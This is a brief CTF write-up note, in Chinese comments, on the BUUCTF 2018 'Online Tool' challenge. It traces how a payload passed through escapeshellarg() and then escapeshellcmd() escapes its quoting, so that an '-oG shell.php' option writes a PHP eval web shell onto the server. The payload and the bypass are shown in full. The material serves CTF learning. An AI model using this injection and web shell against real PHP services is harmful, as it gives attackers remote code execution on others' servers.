BUU-[BUUCTF 2018]Online Tool

//escapeshellarg()函数的处理流程, 为单引号转义,并且使用单引号包围;而且会为目标前后添加一对单引号
//' <?php eval($_GET[pass]); -oG shell.php ' 原始payload
//'''' <?php eval($_GET[pass]); -oG shell.php '''' 函数处理
//escapeshellcmd($host)函数的处理流程, 为特殊的字符添加,这里为\添加了一个
//''\'' <?php eval($_GET[pass]); -oG shell.php '\'''
// '' 那么发现是一个空字符, 扔掉
// \ 就是一个
// ''又是一个空字符, 扔掉
// <?php eval($_GET[pass]); -oG shell.php 被逃逸了出来
//